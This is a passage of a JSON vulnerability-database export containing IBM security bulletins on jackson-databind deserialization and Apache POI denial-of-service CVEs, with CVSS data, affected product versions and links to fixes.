"REDHAT-RHSA-2014-0500.NASL", "REDHAT-RHSA-2019-2935.NASL", "REDHAT-RHSA-2019-2936.NASL", "REDHAT-RHSA-2019-2937.NASL", "REDHAT-RHSA-2019-3044.NASL", "REDHAT-RHSA-2019-3045.NASL", "REDHAT-RHSA-2019-3046.NASL", "REDHAT-RHSA-2020-0159.NASL", "REDHAT-RHSA-2020-0160.NASL", "REDHAT-RHSA-2020-0161.NASL", "REDHAT-RHSA-2020-1454.NASL", "REDHAT-RHSA-2020-1644.NASL", "SL_20140507_STRUTS_ON_SL5_X.NASL", "STRUTS_CLASSLOADER_MANIPULATION.NASL", "VMWARE_VCENTER_VMSA-2014-0008.NASL", "VMWARE_VMSA-2014-0008.NASL", "WEBSPHERE_711865.NASL", "WEBSPHERE_7_0_0_33.NASL", "WEBSPHERE_PORTAL_7_0_0_2_CF29.NASL", "WEBSPHERE_PORTAL_8_5_0_0_CF02.NASL", "WEBSPHERE_PORTAL_CVE-2014-0114.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105086", "OPENVAS:1361412562310105087", "OPENVAS:1361412562310105088", "OPENVAS:1361412562310123417", "OPENVAS:1361412562310702940", "OPENVAS:1361412562310704452", "OPENVAS:1361412562310704542", "OPENVAS:1361412562310868112", "OPENVAS:1361412562310871164", "OPENVAS:1361412562310875213", "OPENVAS:1361412562310876828", "OPENVAS:1361412562310876829", "OPENVAS:1361412562310876830", "OPENVAS:1361412562310876832", "OPENVAS:1361412562310876833", "OPENVAS:1361412562310876834", "OPENVAS:1361412562310876835", "OPENVAS:1361412562310876837", "OPENVAS:1361412562310876898", "OPENVAS:1361412562310876900", "OPENVAS:1361412562310876901", "OPENVAS:1361412562310876904", "OPENVAS:1361412562310876908", "OPENVAS:1361412562310877109", "OPENVAS:1361412562310877119", "OPENVAS:1361412562310877127", "OPENVAS:1361412562310877141", "OPENVAS:1361412562310877212", "OPENVAS:1361412562310877251", "OPENVAS:1361412562310877267", "OPENVAS:1361412562310877291", "OPENVAS:1361412562310877322", "OPENVAS:1361412562310881933", "OPENVAS:1361412562310891798", "OPENVAS:1361412562310891853", "OPENVAS:1361412562310891943", "OPENVAS:702940", "OPENVAS:871164", "OPENVAS:881933"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2017", "ORACLE:CPUAPR2019", "ORACLE:CPUAPR2020", "ORACLE:CPUAPR2021", "ORACLE:CPUAPR2022", "ORACLE:CPUJAN2015", "ORACLE:CPUJAN2018", "ORACLE:CPUJAN2019", "ORACLE:CPUJAN2020", "ORACLE:CPUJAN2021", "ORACLE:CPUJAN2022", "ORACLE:CPUJUL2014-1972956", "ORACLE:CPUJUL2018", "ORACLE:CPUJUL2019", "ORACLE:CPUJUL2020", "ORACLE:CPUJUL2021", "ORACLE:CPUOCT2014-1972960", "ORACLE:CPUOCT2016", "ORACLE:CPUOCT2017", "ORACLE:CPUOCT2018", "ORACLE:CPUOCT2019", "ORACLE:CPUOCT2020"]}, {"type": "oraclelinux", "idList": ["ELSA-2014-0474", "ELSA-2020-0194", "ELSA-2020-1644"]}, {"type": "osv", "idList": ["OSV:DLA-1798-1", "OSV:DLA-1853-1", "OSV:DLA-1943-1", "OSV:DLA-57-1", "OSV:DSA-2940-1", "OSV:DSA-4452-1", "OSV:DSA-4542-1", "OSV:GHSA-523C-XH4G-MH5M", "OSV:GHSA-5WW9-J83M-Q7QX", "OSV:GHSA-C27H-MCMW-48HV", "OSV:GHSA-FMMC-742Q-JG75", "OSV:GHSA-HRMR-F5M6-M9PQ", "OSV:GHSA-MX7P-6679-8G3Q", "OSV:GHSA-P66X-2CV9-QQ3V", "OSV:GHSA-RHCG-RWHX-QJ3J"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:149050"]}, {"type": "redhat", "idList": ["RHSA-2014:0474", "RHSA-2014:0497", "RHSA-2014:0498", "RHSA-2014:0500", "RHSA-2014:0511", "RHSA-2015:0234", "RHSA-2015:0235", "RHSA-2015:0675", "RHSA-2015:0720", "RHSA-2018:1322", "RHSA-2018:2669", "RHSA-2019:2858", "RHSA-2019:2935", "RHSA-2019:2936", "RHSA-2019:2937", "RHSA-2019:2938", "RHSA-2019:2995", "RHSA-2019:2998", "RHSA-2019:3044", "RHSA-2019:3045", "RHSA-2019:3046", "RHSA-2019:3050", "RHSA-2019:3149", "RHSA-2019:3200", "RHSA-2019:3901", "RHSA-2020:0159", "RHSA-2020:0160", "RHSA-2020:0161", "RHSA-2020:0164", "RHSA-2020:0445", "RHSA-2020:0895", "RHSA-2020:0899", "RHSA-2020:0939", "RHSA-2020:0983", "RHSA-2020:1454", "RHSA-2020:1644", "RHSA-2020:2067", "RHSA-2020:2321", "RHSA-2020:2333", "RHSA-2020:3192"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-12626", "RH:CVE-2018-11771", "RH:CVE-2019-10202", "RH:CVE-2019-12086", "RH:CVE-2019-16942", "RH:CVE-2019-16943", "RH:CVE-2019-3834"]}, {"type": "rocky", "idList": ["RLBA-2019:3416", "RLSA-2020:1644"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30528", "SECURITYVULNS:DOC:30529", "SECURITYVULNS:DOC:30881", "SECURITYVULNS:VULN:13701", "SECURITYVULNS:VULN:13845", "SECURITYVULNS:VULN:13868", "SECURITYVULNS:VULN:14031", "SECURITYVULNS:VULN:14233"]}, {"type": "suse", "idList": ["SUSE-SU-2014:0902-1"]}, {"type": "symantec", "idList": ["SMNTC-102879", "SMNTC-109227", "SMNTC-111564"]}, {"type": "ubuntu", "idList": ["USN-4766-1", "USN-4774-1", "USN-4813-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2014-0114", "UB:CVE-2014-3578", "UB:CVE-2017-12626", "UB:CVE-2018-11771", "UB:CVE-2019-12086", "UB:CVE-2019-16942", "UB:CVE-2019-16943"]}, {"type": "veracode", "idList": ["VERACODE:21602", "VERACODE:21603"]}, {"type": "vmware", "idList": ["VMSA-2014-0008", "VMSA-2014-0008.2"]}, {"type": "zdt", "idList": ["1337DAY-ID-27400"]}]}, "affected_software": {"major_version": [{"name": "ibm cloud pak system", "version": 2}]}, "epss": [{"cve": "CVE-2014-0114", "epss": "0.973390000", "percentile": "0.997760000", "modified": "2023-03-19"}, {"cve": "CVE-2014-3578", "epss": "0.003010000", "percentile": "0.647920000", "modified": "2023-03-19"}, {"cve": "CVE-2017-12626", "epss": "0.019770000", "percentile": "0.869610000", "modified": "2023-03-19"}, {"cve": "CVE-2018-11771", "epss": "0.001840000", "percentile": "0.540300000", "modified": "2023-03-19"}, {"cve": "CVE-2019-12086", "epss": "0.002020000", "percentile": "0.563760000", "modified": "2023-03-19"}, {"cve": "CVE-2019-16942", "epss": "0.002920000", "percentile": "0.642360000", "modified": "2023-03-19"}, {"cve": "CVE-2019-16943", "epss": "0.002920000", "percentile": "0.642360000", "modified": "2023-03-19"}], "vulnersScore": 1.4}, "_state": {"dependencies": 1677534856, "score": 1684014897, "affected_software_major_version": 1677535305, "epss": 1679302437}, "_internal": {"score_hash": "d7735ee4c40392f6b4e1eca657722120"}, "affectedSoftware": [{"version": "2.3", "operator": "eq", "name": "ibm cloud pak system"}]}

{"ibm": [{"lastseen": "2023-02-24T01:39:25", "description": "## Summary\n\nIBM Watson Discovery for IBM Cloud Pak for Data ships with versions of FasterXML jackson-databind vulnerable to serialization gadgets.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-16943](<https://vulners.com/cve/CVE-2019-16943>) \n** DESCRIPTION: **A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the p6spy (3.8.6) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of com.p6spy.engine.spy.P6DataSource mishandling. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/168255](<https://exchange.xforce.ibmcloud.com/vulnerabilities/168255>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n \n** CVEID: **[CVE-2019-16942](<https://vulners.com/cve/CVE-2019-16942>) \n** DESCRIPTION: **A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the commons-dbcp (1.4) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of org.apache.commons.dbcp.datasources.SharedPoolDataSource and org.apache.commons.dbcp.datasources.PerUserPoolDataSource mishandling. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/168254](<https://exchange.xforce.ibmcloud.com/vulnerabilities/168254>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nICP - Discovery| 2.0.0-2.0.1 \n \n\n\n## Remediation/Fixes\n\nUpgrade to IBM Watson Discovery 2.1\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-20T08:47:33", "type": "ibm", "title": "Security Bulletin: IBM Watson Discovery for IBM Cloud Pak for Data affected by vulnerability in FasterXML jackson-databind", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16942", "CVE-2019-16943"], "modified": "2019-12-20T08:47:33", "id": "ADF0635C8C226573B68B90CCCD3BBEE5D58D01FA40BFFCEB1F024C6F94610012", "href": "https://www.ibm.com/support/pages/node/1126365", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-24T01:39:59", "description": "## Summary\n\nMultiple vulnerabilities exist in the Jackson databind, core, and annotations version used by IBM Spectrum Symphony V7.3, V7.2.1, V7.2.0.2, and V7.1.2, and IBM Platform Symphony V7.1.1 and V7.1 Fix Pack 1. Interim fixes that provide instructions on upgrading the Jackson databind, core, and annotations package to version 2.10.1 (which resolves these vulnerabilities) are available on IBM Fix Central. \n\n## Vulnerability Details\n\n**CVEID: **[CVE-2019-17531](<https://vulners.com/cve/CVE-2019-17531>) \n**DESCRIPTION: **A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a JNDI service to access, it is possible to make the service execute a malicious payload. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/169073](<https://exchange.xforce.ibmcloud.com/vulnerabilities/169073>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n \n**CVEID: **[CVE-2019-16943](<https://vulners.com/cve/CVE-2019-16943>) \n**DESCRIPTION: **A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the p6spy (3.8.6) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of com.p6spy.engine.spy.P6DataSource mishandling. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/168255](<https://exchange.xforce.ibmcloud.com/vulnerabilities/168255>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n \n**CVEID: **[CVE-2019-16942](<https://vulners.com/cve/CVE-2019-16942>) \n**DESCRIPTION: **A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the commons-dbcp (1.4) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of org.apache.commons.dbcp.datasources.SharedPoolDataSource and org.apache.commons.dbcp.datasources.PerUserPoolDataSource mishandling. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/168254](<https://exchange.xforce.ibmcloud.com/vulnerabilities/168254>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n \n**CVEID: **[CVE-2019-17267](<https://vulners.com/cve/CVE-2019-17267>) \n**DESCRIPTION: **A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10. It is related to net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/168514](<https://exchange.xforce.ibmcloud.com/vulnerabilities/168514>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM Spectrum Symphony | 7.3 \nIBM Spectrum Symphony | 7.2.1 \nIBM Spectrum Symphony | 7.2.0.2 \nIBM Spectrum Symphony | 7.1.2 \nIBM Platform Symphony | 7.1.1 \nIBM Platform Symphony | 7.1 Fix Pack 1 \n \n## Remediation/Fixes\n\nIBM Spectrum Symphony 7.3 | [sym-7.3-build535377](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build535377&includeSupersedes=0>) \n---|--- \nIBM Spectrum Symphony 7.2.1 | [sym-7.2.1-build535376](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build535376&includeSupersedes=0>) \nIBM Spectrum Symphony 7.2.0.2 | [sym-7.2.0.2-build535375](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build535375&includeSupersedes=0>) \nIBM Spectrum Symphony 7.1.2 | \n\n[sym-7.1.2-build535374](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.1.2-build535374&includeSupersedes=0>) \n \nIBM Platform Symphony 7.1.1 | [sym-7.1.1-build535373](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/Platform+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.1.1-build535373&includeSupersedes=0>) \nIBM Platform Symphony 7.1 Fix Pack 1 | [sym-7.1-build535372](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/Platform+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.1-build535372&includeSupersedes=0>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-17T02:33:42", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in jackson-databind affect IBM Platform Symphony and IBM Spectrum Symphony", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16942", "CVE-2019-16943", "CVE-2019-17267", "CVE-2019-17531"], "modified": "2019-12-17T02:33:42", "id": "D76879E8E9C0967E4A6B7FF8216C0847B633BB1DAC32CEE31E4544A60A45BA68", "href": "https://www.ibm.com/support/pages/node/1137232", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:44:05", "description": "## Summary\n\nApache POI used by IBM Maximo Asset Management is vulnerable to a denial of service, cause by an XML External Entity Injection (XXE) error when processing XML data. By using a specially-crafted OOXML file, a remote attacker could exploit this vulnerability to consume all available CPU resources.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-12626_](<https://vulners.com/cve/CVE-2017-12626>)** \nDESCRIPTION:** Apache POI is vulnerable to a denial of service, cause by an XML External Entity Injection (XXE) error when processing XML data. By using a specially-crafted OOXML file, a remote attacker could exploit this vulnerability to consume all available CPU resources. \nCVSS Base Score: 5.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/138361_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/138361>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n## Affected Products and Versions\n\nThe following Apache POI versions are affected: \n\n\n * Apache POI 3.14 and earlier releases\n \nIBM supplied Apache POI with the following: \n \nThe 7.5.0.x and 7.6.0.x versions of Maximo Asset Management bundled Apache POI 3.7, 3.8, and 3.14. \n \nThis vulnerability affects the following versions of the IBM Maximo Asset Management core product, and all other IBM Maximo Industry Solution and IBM Control Desk products, regardless of their own version, if they are currently installed on top of an affected IBM Maximo Asset Management. * \n \n \n**Maximo Asset Management core product affected versions:** \nMaximo Asset Management 7.6, 7.5 \nMaximo Asset Management Essentials 7.5 \n \n**Industry Solutions products affected if using an affected core version:** \nMaximo for Aviation \nMaximo for Government \nMaximo for Life Sciences \nMaximo for Nuclear Power \nMaximo for Oil and Gas \nMaximo for Transportation \nMaximo for Utilities \n \n**IBM Control Desk products affected if using an affected core version:** \nSmartCloud Control Desk \nIBM Control Desk \nTivoli Integration Composer \n \n* To determine the core product version, log in and view System Information. The core product version is the \"Tivoli's process automation engine\" version. Please consult the [_Product Coexistence Matrix_](<https://www.ibm.com/developerworks/community/wikis/home?lang=en#!/wiki/IBM%20Maximo%20Asset%20Management/page/Product%20compatibility>) for a list of supported product combinations. \n\n## Remediation/Fixes\n\nThe recommended solution is to download the appropriate Interim Fix or Fix Pack from Fix Central ([_What is Fix Central?_](<http://www.ibm.com/systems/support/fixes/en/fixcentral/help/faq_sw.html>)) and apply for each affected product as soon as possible. Please see below for information on the fixes available for each product, version, and release. Follow the installation instructions in the \u2018readme\u2019 documentation provided with each fix pack or interim fix. \n\n\n**For Maximo Asset Management 7.6, 7.5: **\n\n**VRM**| **Fix Pack, Feature Pack, or Interim Fix**| **Download ** \n---|---|--- \n7.6.0| Maximo 7.6.0.9 Interim Fix: \n7.6.0.9-TIV-MBS-IFIX004 or latest Interim Fix available| [_FixCentral_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Tivoli&product=ibm/Tivoli/IBM+Maximo+Asset+Management&release=7.6.0.9&platform=All&function=all>) \n7.5.0| Maximo 7.5.0.11 Interim Fix: \n7.5.0.11-TIV-MBS-IFIX013| [_FixCentral_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Tivoli&product=ibm/Tivoli/IBM+Maximo+Asset+Management&release=7.5.0.11&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-06-17T15:50:45", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache POI affects IBM Maximo Asset Management (CVE-2017-12626)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12626"], "modified": "2018-06-17T15:50:45", "id": "3E8AD8E5AA3CC6B39E8DB40BBEBEB8A2737CE40275360EB8D2C188A14A72D4E3", "href": "https://www.ibm.com/support/pages/node/570183", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-27T17:46:07", "description": "## Summary\n\nIBM Cognos Business Intelligence is shipped as a component of Business Monitor. Information about a security vulnerability affecting Cognos Business Intelligence has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nPrincipal product and version| Affected product and version \n---|--- \nBusiness Monitor V8.5.7| WebSphere Application Server V8.5.5 \nBusiness Monitor V8.5.6| WebSphere Application Server V8.5.5 \nBusiness Monitor V8.5.5| WebSphere Application Server V8.5.5 \n \n \n\n\n## Remediation/Fixes\n\nPlease consult the security bulletin [Security Bulletin: IBM Cognos Business Intelligence has addressed multiple vulnerabilties](<https://www.ibm.com/support/pages/node/1142626> \"Security Bulletin: IBM Cognos Business Intelligence has addressed multiple vulnerabilties\" ) vulnerability details and information about fixes.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2020-04-27T08:16:03", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM Cognos Business Intelligence shipped with IBM Business Monitor (CVE-2017-12626)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-12626"], "modified": "2020-04-27T08:16:03", "id": "DB0FA9F3BEEDABDE80F9E34B7FD19E3F236E4D322D5E55572DDDEC14A0312943", "href": "https://www.ibm.com/support/pages/node/6201668", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-21T21:45:21", "description": "## Summary\n\nPublic disclosed vulnerability from Apache Poi\n\n## Vulnerability Details\n\n**CVEID: ** [CVE-2017-12626](<https://vulners.com/cve/CVE-2017-12626>) \n**Description: **Apache POI is vulnerable to a denial of service, caused by an error while parsing malicious WMF, EMF, MSG and macros and specially crafted DOC, PPT and XLS. By persuading a victim to open a specially crafted file, a remote attacker could exploit this vulnerability to cause the application to enter into an infinite loop or an out of memory exception. \n**CVSS Base Score: **5.50 \n**CVSS Temporal Score: ** See <https://exchange.xforce.ibmcloud.com/vulnerabilities/138361> for the current score \n**CVSS Environmental Score: ***Undefined \n**CVSS Vector: **CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H \n\n\n## Affected Products and Versions\n\nIBM QRadar Incident Forensics 7.3.0 to 7.3.1 Patch 4\n\nIBM QRadar Incident Forensics 7.2.0 to 7.2.8 Patch 13\n\n## Remediation/Fixes\n\n[QRadar / QRM / QVM / QRIF / QNI 7.3.1 Patch 5](<https://www-945.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.3.0&platform=All&function=fixId&fixids=7.3.1-QRADAR-QRSIEM-20180720020816&includeRequisites=1&includeSupersedes=0&downloadMethod=http>)\n\n[QRadar / QRM / QVM / QRIF / QNI 7.2.8 Patch 14](<https://www-945.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.2.0&platform=All&function=fixId&fixids=7.2.8-QRADAR-QRSIEM-20181017162208&includeRequisites=1&includeSupersedes=0&downloadMethod=http>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-12-04T01:50:02", "type": "ibm", "title": "Security Bulletin: Public disclosed vulnerability from Apache Poi", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12626"], "modified": "2018-12-04T01:50:02", "id": "AF51E1CC97DA90D00CDACD35B02B7E7108FB894DA97EFC4B711F84EEBE554D1F", "href": "https://www.ibm.com/support/pages/node/729697", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-21T21:40:05", "description": "## Summary\n\nIBM DataQuant has addressed the following vulnerabiltiy.\n\n## Vulnerability Details\n\n**Advisory CVEs:** CVE-2017-12626\n\n**CVEID:** [CVE-2017-12626](<https://vulners.com/cve/CVE-2017-12626>) \n**DESCRIPTION:** Apache POI is vulnerable to a denial of service, caused by an error while parsing malicious WMF, EMF, MSG and macros and specially crafted DOC, PPT and XLS. By persuading a victim to open a specially crafted file, a remote attacker could exploit this vulnerability to cause the application to enter into an infinite loop or an out of memory exception. \nCVSS Base Score: 5.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/138361> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\n**Affected IBM DataQuant**\n\n| \n\n**Affected Versions** \n \n---|--- \n \nIBM DataQuant for z/OS\n\n| \n\n2.1 \n \nIBM DataQuant for Multiplatforms\n\n| \n\n2.1 \n \n## Remediation/Fixes\n\nNone. See 'Workarounds and Mitigations'.\n\n## Workarounds and Mitigations\n\nUse the following instructions to replace DataQuant\u2019s Apache POI library with the latest version, which is 3.17: \n\n1\\. Install 7-Zip or other file archiver.\n\n2\\. Download POI 3.17 ([https://www.apache.org/dyn/closer.lua/poi/release/bin/poi-bin-3.17-2017\u2026](<https://www.apache.org/dyn/closer.lua/poi/release/bin/poi-bin-3.17-20170915.zip>)). \n\nFind the following jar files inside the archive:\n\npoi-3.17.jar\n\npoi-ooxml-3.17.jar\n\npoi-ooxml-schemas-3.17.jar\n\ncommons-collections4-4.1.jar (under \"lib\" folder)\n\ncommons-codec-1.10.jar (under \"lib\" folder)\n\ncommons-logging-1.2.jar (under \"lib\" folder)\n\ncurvesapi-1.04.jar (under \"ooxml-lib\" folder)\n\nxmlbeans-2.6.0.jar (under \"ooxml-lib\" folder)\n\n3\\. In the DataQuant for Workstation\\plugins folder, rename com.ibm.bi.core.poi_2.1.7.20170216.jar to com.ibm.bi.core.poi_2.1.7.20170216.zip and open it in the archiver that you have installed in step #1.\n\n\\- Remove everything from the \"lib\" folder\n\n\\- Copy the poi-3.17.jar,poi-ooxml-3.17.jar,poi-ooxml-schemas-3.17.jar,xmlbeans-2.6.0.jar,\n\ncurvesapi-1.04.jar,commons-collections4-4.1.jar files into the \"lib\" folder\n\n\\- Modify the META-INF\\MANIFEST-MF file. \n\nInstead of\n\nBundle-ClassPath: 